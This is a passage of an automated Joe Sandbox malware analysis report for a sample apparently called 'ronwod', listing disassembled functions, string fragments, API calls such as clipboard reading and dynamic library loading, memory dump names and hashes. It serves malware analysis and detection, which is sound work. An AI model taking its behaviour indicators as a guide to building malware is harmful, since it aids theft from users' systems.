|s, xrefs: 00EB4A8E
9, xrefs: 00EB46D4
PR, xrefs: 00EB4A48
_p, xrefs: 00EB4A02
rl, xrefs: 00EB49D0
0b, xrefs: 00EB3F5C
45, xrefs: 00EB46DE
AQ, xrefs: 00EB4A5C
<, xrefs: 00EB4724
Ys, xrefs: 00EB4A84
wY, xrefs: 00EB49EE
bo, xrefs: 00EB49E4
&Kt0, xrefs: 00EB42B5
mm, xrefs: 00EB49DA
Vq, xrefs: 00EB499E
\\, xrefs: 00EB49F8

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 9$&Kt0$0b$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
API String ID: 0-1097330926
Opcode ID: b196785fe39bb834fa85253ed13ea6a5b7582efa8d33f124db250fa077129855
Instruction ID: 7a7e6c632053c4b29d6e175c28ef27c21e5966a51fc2acdd153f7d12a6ecca8c
Opcode Fuzzy Hash: b196785fe39bb834fa85253ed13ea6a5b7582efa8d33f124db250fa077129855
Instruction Fuzzy Hash: 707262B890626A9BDB60DF59DC893CDBB71FF95304F108AE9C4597B290D7340A85CF82

Function 00EB4060 Relevance: 37.3, APIs: 1, Strings: 20, Instructions: 581COMMON

Download Yara Rule

Strings

Vq, xrefs: 00EB4B78, 00EB42C2, 00EB4971, 00EB4774, 00EB474F, 00EB4579
>>, xrefs: 00EB471A
ef, xrefs: 00EB4AA2
|i, xrefs: 00EB4A98
XH, xrefs: 00EB4A2A
|s, xrefs: 00EB4A8E
9, xrefs: 00EB46D4
PR, xrefs: 00EB4A48
_p, xrefs: 00EB4A02
rl, xrefs: 00EB49D0
45, xrefs: 00EB46DE
AQ, xrefs: 00EB4A5C
<, xrefs: 00EB4724
Ys, xrefs: 00EB4A84
wY, xrefs: 00EB49EE
bo, xrefs: 00EB49E4
&Kt0, xrefs: 00EB42B5
mm, xrefs: 00EB49DA
Vq, xrefs: 00EB499E
\\, xrefs: 00EB49F8

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
API String ID: 0-3538275056
Opcode ID: ac8a0cf2a83009d072b1c3b8fc04f82e3aab5594e2647f0dd96dab872dcb2c65
Instruction ID: 4652cf7e5567986595b0c9dff5fe3c872c432fdd235107a829681cc3da51ec64
Opcode Fuzzy Hash: ac8a0cf2a83009d072b1c3b8fc04f82e3aab5594e2647f0dd96dab872dcb2c65
Instruction Fuzzy Hash: 306242B990626A9BDB60DF19EC883CDBB71FF95304F108AD9C4593B250DB354A85CF82

Function 00232A83 Relevance: 31.5, Strings: 25, Instructions: 244COMMON

Download Yara Rule

Strings

orit, xrefs: 00232C0B
KddaTVdpg, xrefs: 00232CAB
LITkDS, xrefs: 00232CB3
pro, xrefs: 00232BD0
lZnTSoH, xrefs: 00232E06
ject, xrefs: 00232BDA
y lo, xrefs: 00232C15
sea, xrefs: 00232BE4
son , xrefs: 00232BEE
sk s, xrefs: 00232C29
Auth, xrefs: 00232C01
Spee, xrefs: 00232BB2
OVTeaKslizCq, xrefs: 00232D92
f p, xrefs: 00232CA1
Word phone traiTeacher not quickly energy their. Co, xrefs: 00232E29
er., xrefs: 00232C3D
qGoWCeyAc, xrefs: 00232CCD
t ta, xrefs: 00232C1F
Me add require car information. Floor work t, xrefs: 00232CBB
ove, xrefs: 00232B11
umme, xrefs: 00232C33
Concern face foreign mission. Myself, xrefs: 00232E0E
ch a, xrefs: 00232BBC
a, xrefs: 00232BF8
pply, xrefs: 00232BC6

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID:
String ID: pro$ sea$Auth$Concern face foreign mission. Myself$KddaTVdpg$LITkDS$Me add require car information. Floor work t$OVTeaKslizCq$Spee$Word phone traiTeacher not quickly energy their. Co$a$ch a$er.$f p$ject$lZnTSoH$orit$ove$pply$qGoWCeyAc$sk s$son $t ta$umme$y lo
API String ID: 0-347408702
Opcode ID: fda882cddfe02d2d2549647453b00a5b913ae146fc9669bbae5a6ce29faa643b
Instruction ID: f88b6c127fdeda84c3238c1010119f69a8df6d71786a4dba40fce9db0e78f184
Opcode Fuzzy Hash: fda882cddfe02d2d2549647453b00a5b913ae146fc9669bbae5a6ce29faa643b
Instruction Fuzzy Hash: 3AE1CDB0E1421ADFCB60CFA9C982BCDBBF0BF48304F108599E458AB255D3749A95CF95

Function 0023116C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 202sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 002311B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00231238
__p__acmdln.MSVCRT ref: 00231261
malloc.MSVCRT ref: 002312EB
strlen.MSVCRT ref: 00231323
malloc.MSVCRT ref: 0023132E
memcpy.MSVCRT ref: 00231344
GetStartupInfoA.KERNEL32 ref: 00231433

Strings

`<#, xrefs: 00231207

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID: `<#
API String ID: 1672962128-1711413951
Opcode ID: 7cf26bc4c6e1be8788978d86def5040bc754309eb4716d270c38fc8f43d32ca0
Instruction ID: be002f2c7025a07575e45e0e1cd452a1878eda9bc5dd684a2f6e4d8acc05a696
Opcode Fuzzy Hash: 7cf26bc4c6e1be8788978d86def5040bc754309eb4716d270c38fc8f43d32ca0
Instruction Fuzzy Hash: 05819FF19243128FDB14EF64E98836AB7E1FB45304F00452DE9899B311DBB5A878CF92

Function 00EA77AD Relevance: 23.5, APIs: 3, Strings: 10, Instructions: 788COMMON

Download Yara Rule

Strings

)fvf, xrefs: 00EA7CDD
=f(f, xrefs: 00EA7CC5
"f&f, xrefs: 00EA7CB5
21, xrefs: 00EA786B
Pf6f, xrefs: 00EA7CCD
{fGf, xrefs: 00EA7CF6
=f!f, xrefs: 00EA7CBD
Jc1t, xrefs: 00EA77D0
,f4f, xrefs: 00EA7CD5
Jc1t, xrefs: 00EA7886, 00EA78A2, 00EA7D1E, 00EA7D27, 00EA7962, 00EA7913

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "f&f$)fvf$,f4f$21$=f!f$=f(f$Jc1t$Jc1t$Pf6f${fGf
API String ID: 0-2638289701
Opcode ID: 573d8d17293d38d16e36e7e3628b7a4e2dfa93fba34d4c120331872f96b98292
Instruction ID: d0278a874a74675fc570117859e21836c99e65ed8e0fe2b5d187455a608052c3
Opcode Fuzzy Hash: 573d8d17293d38d16e36e7e3628b7a4e2dfa93fba34d4c120331872f96b98292
Instruction Fuzzy Hash: 8A4224725093118FD324CF25D8907ABB3E2FFC9314F15992DE8C9AB261EB34A955CB42

Function 00EAE390 Relevance: 18.3, Strings: 14, Instructions: 821COMMON

Download Yara Rule

Strings

^*a, xrefs: 00EAE6D2
'O'O, xrefs: 00EAEABD
<[&^, xrefs: 00EAE6DA
?g3q, xrefs: 00EAE75A
2O#O, xrefs: 00EAEAC5
sy:K, xrefs: 00EAE712
5a|u, xrefs: 00EAE6FA
%b*], xrefs: 00EAE6BA
A:v], xrefs: 00EAE6CA
7:n\, xrefs: 00EAE877
3?Uq, xrefs: 00EAE6F2
Y?q?, xrefs: 00EAE791
#J+Y, xrefs: 00EAE732
>, xrefs: 00EAE72A

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ^*a$#J+Y$%b*]$'O'O$2O#O$3?Uq$5a|u$7:n\$<[&^$>$?g3q$A:v]$Y?q?$sy:K
API String ID: 0-3553224314
Opcode ID: 6b78522be3565c1828189770c5e59905858b25901dd68f87031819b44bad9d23
Instruction ID: b82a48478639e44ac9346467c0e99281d9492f27068e7a1cf46a46a46c25c0af
Opcode Fuzzy Hash: 6b78522be3565c1828189770c5e59905858b25901dd68f87031819b44bad9d23
Instruction Fuzzy Hash: 425247719083918FC724DF24C85076FBBE1AF9A318F088A6DE4D96F392E7359905C792

Function 00EB0A20 Relevance: 16.7, Strings: 13, Instructions: 419COMMON

Download Yara Rule

Strings

k3l3, xrefs: 00EB0AD0
#3=3, xrefs: 00EB0AF8
83F3, xrefs: 00EB0B08
J3L3, xrefs: 00EB0B10
d3f3, xrefs: 00EB0AC0
93=3, xrefs: 00EB0B00
*, xrefs: 00EB0EBB
i3_3, xrefs: 00EB0AC8
O30, xrefs: 00EB0B18
'3!3, xrefs: 00EB0AF0
83R3, xrefs: 00EB0AD8
#3#3, xrefs: 00EB0AE8
:3 3, xrefs: 00EB0AE0

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: #3#3$#3=3$'3!3$*$83F3$83R3$93=3$:3 3$J3L3$O30$d3f3$i3_3$k3l3
API String ID: 0-1612148737
Opcode ID: 2b1c026cea850efa5db64c37ecb2bbb5b966de60daacd07dc25ffcb283225a19
Instruction ID: 54cfe4bcc831b8d1ff710289c78d1b0c0afa5099a8473136b7a3066e5975a74b
Opcode Fuzzy Hash: 2b1c026cea850efa5db64c37ecb2bbb5b966de60daacd07dc25ffcb283225a19
Instruction Fuzzy Hash: B2B1B2B15183108BC724DF18C8566ABB7F1FFD1358F189A1CE4969B3A0E774E944CB92

Function 002313C9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00231238
__p__acmdln.MSVCRT ref: 00231261
malloc.MSVCRT ref: 002312EB
strlen.MSVCRT ref: 00231323
malloc.MSVCRT ref: 0023132E
memcpy.MSVCRT ref: 00231344
_amsg_exit.MSVCRT ref: 002313EA
_initterm.MSVCRT ref: 0023140C

Strings

`<#, xrefs: 00231207

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID: `<#
API String ID: 2053141405-1711413951
Opcode ID: 2d8a60deface247e301b8c15a0b69fc8a460a1fcd617683172ab0992f8ebf2a4
Instruction ID: 5b5d2cc56cbe9387177054d80451499bf2b6e6ae6544a7d5fc83b0f4bcc5263d
Opcode Fuzzy Hash: 2d8a60deface247e301b8c15a0b69fc8a460a1fcd617683172ab0992f8ebf2a4
Instruction Fuzzy Hash: E24127F49283118FDB14EF64E98836EBBE1FB44304F10496DE9889B311DB74A969CF52

Function 00EB85E1 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 300COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00EB860A

Strings

cJwJ, xrefs: 00EB891A
rJnJ, xrefs: 00EB892A
J, xrefs: 00EB893A
wJbJ, xrefs: 00EB8912
tJdJ, xrefs: 00EB8932
bJSJ, xrefs: 00EB89D9
,J^J, xrefs: 00EB8922

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: J$,J^J$bJSJ$cJwJ$rJnJ$tJdJ$wJbJ
API String ID: 237503144-492521606
Opcode ID: 98abec52cdba175e015f5d652ac654c2291878237ff7c5b71977617f280d7c27
Instruction ID: 66f5fa1cd2b38b3012ea8458ff5b31b514c0dcfbb55a8eb0c0be377118ee63b6
Opcode Fuzzy Hash: 98abec52cdba175e015f5d652ac654c2291878237ff7c5b71977617f280d7c27
Instruction Fuzzy Hash: DDA1B0729083128FD724CF54D8506ABB3F2FFC0358F05992DE99AAB350EB749945CB86

Function 002311A3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 002311B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00231238
__p__acmdln.MSVCRT ref: 00231261
malloc.MSVCRT ref: 002312EB
strlen.MSVCRT ref: 00231323
malloc.MSVCRT ref: 0023132E
memcpy.MSVCRT ref: 00231344
_amsg_exit.MSVCRT ref: 002313EA
_initterm.MSVCRT ref: 0023140C

Strings

`<#, xrefs: 00231207

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID: `<#
API String ID: 2230096795-1711413951
Opcode ID: 42c9281b2399721759f077527827aea27473f21e5e304f41f293acc544662f7c
Instruction ID: ad2da79692347ea3d10ef99165ef8428b85012249047e0025776d3ae75ac6827
Opcode Fuzzy Hash: 42c9281b2399721759f077527827aea27473f21e5e304f41f293acc544662f7c
Instruction Fuzzy Hash: 21413CB4A143128FDB14EF68E98876EBBF0FB44304F00456DE9859B310DB74A969CF92

Function 00EC6569 Relevance: 12.8, Strings: 10, Instructions: 278COMMON

Download Yara Rule

Strings

L|, xrefs: 00EC65F6
3), xrefs: 00EC6896
|, xrefs: 00EC658A
?|, xrefs: 00EC6674
Y|, xrefs: 00EC6593
A|, xrefs: 00EC65DB
<, xrefs: 00EC6739
H|, xrefs: 00EC661A
0, xrefs: 00EC6886
>, xrefs: 00EC6742

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 0$3)$<$>$?|$A|$H|$L|$Y|$|
API String ID: 0-3316653610
Opcode ID: 535ba9e0d7fd26c26ceeb0ee158d644e6941cc27d5f9f70b970bfc6a064e0a8a
Instruction ID: df5303977663a13616c04f6eec1e98cbd53c6bb81e01122d84d338f06670c98c
Opcode Fuzzy Hash: 535ba9e0d7fd26c26ceeb0ee158d644e6941cc27d5f9f70b970bfc6a064e0a8a
Instruction Fuzzy Hash: 7DC1D132D1426886DB24CF69CD107DEB3B2EF40314F1595EDC859BB3A5E7354A82CB8A

Function 00231160 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 002311B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00231238
__p__acmdln.MSVCRT ref: 00231261
malloc.MSVCRT ref: 002312EB
strlen.MSVCRT ref: 00231323
malloc.MSVCRT ref: 0023132E
memcpy.MSVCRT ref: 00231344
GetStartupInfoA.KERNEL32 ref: 00231433

Strings

`<#, xrefs: 00231207

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID: `<#
API String ID: 1672962128-1711413951
Opcode ID: 99d71ee277ce5ccde8bbe7afcec642dc79718ca711e23a36c39d8d7a9e04b5b9
Instruction ID: 8c60ad737e38878a0229eddfc7018a491dfee42c5c4d87387751ee052a13d4ab
Opcode Fuzzy Hash: 99d71ee277ce5ccde8bbe7afcec642dc79718ca711e23a36c39d8d7a9e04b5b9
Instruction Fuzzy Hash: E0518EB1A143118FDB14EF68F98876ABBF0FB48304F10452DE9449B310DB71A969CF92

Function 002314E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 002314F0
LoadLibraryA.KERNEL32 ref: 00231506
GetProcAddress.KERNEL32 ref: 00231525
GetProcAddress.KERNEL32 ref: 00231537

Strings

__register_frame_info, xrefs: 0023151A
libgcc_s_dw2-1.dll, xrefs: 002314E9, 002314FF
__deregister_frame_info, xrefs: 0023152C

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 54ea21d33867253ecca39b0580712e5f1af2c99c8c37d6f569593acc4a7e5030
Instruction ID: 52cb377259403effd6867de3c118d0b22beec6ee8e1d8ab49cc11a8942abd35d
Opcode Fuzzy Hash: 54ea21d33867253ecca39b0580712e5f1af2c99c8c37d6f569593acc4a7e5030
Instruction Fuzzy Hash: C2011EF19293019BC7107F78A94D21D7EE4AB45350F41446DD5C99B200D7B58468DBA3

Function 00EACAA0 Relevance: 11.8, Strings: 9, Instructions: 564COMMON

Download Yara Rule

Strings

(!T!, xrefs: 00EACB6E
|jsj, xrefs: 00EACEA0
*, xrefs: 00EAD128
ejuj, xrefs: 00EACEB8
pdvd, xrefs: 00EACCD3
8!?!, xrefs: 00EACB5E
2!0!, xrefs: 00EACB46
8!(!, xrefs: 00EACB4E
=_, xrefs: 00EAD054

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: (!T!$*$2!0!$8!(!$8!?!$=_$ejuj$pdvd$|jsj
API String ID: 0-157059723
Opcode ID: 936a1ca9162f0883198e57ef0cdf50f00f686f0cecfae1c0e60185eafedc9a82
Instruction ID: 8da0e7eff7d6b5eb599db65d2de41f34cfa5c89ad3f6a642e6498e195c0a8b6c
Opcode Fuzzy Hash: 936a1ca9162f0883198e57ef0cdf50f00f686f0cecfae1c0e60185eafedc9a82
Instruction Fuzzy Hash: F502D0B290C3109BC7049F15D88166BB7F2FF9A314F08982DF5C5AB251E735EA09CB96

Function 00EB8A4D Relevance: 11.6, Strings: 9, Instructions: 394COMMON

Download Yara Rule

Strings

cJwJ, xrefs: 00EB891A
rJnJ, xrefs: 00EB892A
J, xrefs: 00EB893A
wJbJ, xrefs: 00EB8912
Uqmq, xrefs: 00EB8ADE
tJdJ, xrefs: 00EB8932
bJSJ, xrefs: 00EB89D9
oq|q, xrefs: 00EB8B36
,J^J, xrefs: 00EB8922

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: J$,J^J$Uqmq$bJSJ$cJwJ$oq|q$rJnJ$tJdJ$wJbJ
API String ID: 0-594100160
Opcode ID: 1eca00bc3605a16f2191caa9f4b171a876a42733e8fdb9c879b096adf07169e8
Instruction ID: dc269fcbc1fbb8c67c818037397a9d97ee42aa8e7010cd6032c95cf83d53a840
Opcode Fuzzy Hash: 1eca00bc3605a16f2191caa9f4b171a876a42733e8fdb9c879b096adf07169e8
Instruction Fuzzy Hash: 8FC1EDB15083018BD718DF54D8616ABB3F2FFC1354F04A92DE885AB3A4FB789914CB5A

Function 00EA16A0 Relevance: 11.1, APIs: 3, Strings: 2, Instructions: 2356COMMON

Download Yara Rule

Strings

`, xrefs: 00EA25BC
&8, xrefs: 00EA19C3

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: &8$`
API String ID: 0-842996520
Opcode ID: 2ed1a0a6570067bc791f2c80f0c57535a5f48651cbfdb08cc04acc19ad48cb0c
Instruction ID: b9dacec160c6f8a282f7da125f2e75f61fd98c55e8768188fc2cdf65f66c1283
Opcode Fuzzy Hash: 2ed1a0a6570067bc791f2c80f0c57535a5f48651cbfdb08cc04acc19ad48cb0c
Instruction Fuzzy Hash: 0D13D0B6D042148FCB14DF78C8813AEBBF1AF49310F1596ADE859BB391E7349945CB82

Function 00EC22E0 Relevance: 9.1, APIs: 6, Instructions: 104clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00EC22F0
GetClipboardData.USER32 ref: 00EC230B
GlobalLock.KERNEL32 ref: 00EC232A
CloseClipboard.USER32 ref: 00EC243D

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: c1f168f5b6ecb25f99a6216013da0c568233fa2aeada55765afae31e38efd3b6
Instruction ID: 354f80e1a5ccda610da4ce31e56df3b138dc71d418d11e6eb119e4aeaac2a78d
Opcode Fuzzy Hash: c1f168f5b6ecb25f99a6216013da0c568233fa2aeada55765afae31e38efd3b6
Instruction Fuzzy Hash: 59318D7150C3518FC300BF69E6857AEBBE1FF90310F11282EE5C6A6221D77A898A9753

Function 00EA51A9 Relevance: 8.0, Strings: 6, Instructions: 496COMMON

Download Yara Rule

Strings

sG, xrefs: 00EA5596
_KT!, xrefs: 00EA54A6
C!ZZ, xrefs: 00EA547A
%Z, xrefs: 00EA5A1F
L4, xrefs: 00EA57E0
@U, xrefs: 00EA5578

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: %Z$C!ZZ$_KT!$@U$sG$L4
API String ID: 0-165977842
Opcode ID: 38ec2eb5dd57ca7990ba3d81612a1dbd7ad40b93f120cc102fe8bfbab7d8c9d0
Instruction ID: 44d3fc480f860b7f643d8e8aa322c9cb858cbb5ab59fd2ce000e0280fdf000d5
Opcode Fuzzy Hash: 38ec2eb5dd57ca7990ba3d81612a1dbd7ad40b93f120cc102fe8bfbab7d8c9d0
Instruction Fuzzy Hash: 3DE13572619700DFC7248F24E8817AFB3E6FFC9314F15592DE4DA9B261EB3598508B42

Function 00E9DA8B Relevance: 7.8, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

D, xrefs: 00E9DD75
6"", xrefs: 00E9DEB1
"", xrefs: 00E9DE61
d"P", xrefs: 00E9DE49
"", xrefs: 00E9DE91
p"F", xrefs: 00E9DE11

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 6""$D$d"P"$p"F"$""$""
API String ID: 0-1382292853
Opcode ID: fcad1a960237d36c52851553967a97bc3d60ea8a91315a73bdf06faceaa393f2
Instruction ID: 8db30b2933e1b1e055404b7789cbf41d0e16c576ac348fc573599ceb87fcab00
Opcode Fuzzy Hash: fcad1a960237d36c52851553967a97bc3d60ea8a91315a73bdf06faceaa393f2
Instruction Fuzzy Hash: E7B1D2B04093819BE728CF81CA9576BBBF1FF85748F105A8CE5952B290D3F58548DF86

Function 00EB5770 Relevance: 7.7, Strings: 6, Instructions: 226COMMON

Download Yara Rule

Strings

o2x2, xrefs: 00EB5993
c2o2, xrefs: 00EB59BB
m2?2, xrefs: 00EB59AB
M2x2, xrefs: 00EB59B3
}2q2, xrefs: 00EB5983
u202, xrefs: 00EB598B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
API String ID: 0-1290146539
Opcode ID: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction ID: d0ee11003c57b4bde2d164729f9e09b1ad7881abe9120b1b1a8c5421011a2653
Opcode Fuzzy Hash: f38e1199e481c1a9992ff0379b5f7aa6b3030943ecfae1711c30923de6d3298a
Instruction Fuzzy Hash: 86611EB29087509BD724CF18C9817ABB7F1FFC1328F08992DE8856B394E7758904CB86

Function 00EB6990 Relevance: 7.6, Strings: 6, Instructions: 104COMMON

Download Yara Rule

Strings

4M:M, xrefs: 00EB71AE
)M-M, xrefs: 00EB712A
MM, xrefs: 00EB710C
-M M, xrefs: 00EB71C4
%M)M, xrefs: 00EB7198
>M5M, xrefs: 00EB718D

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

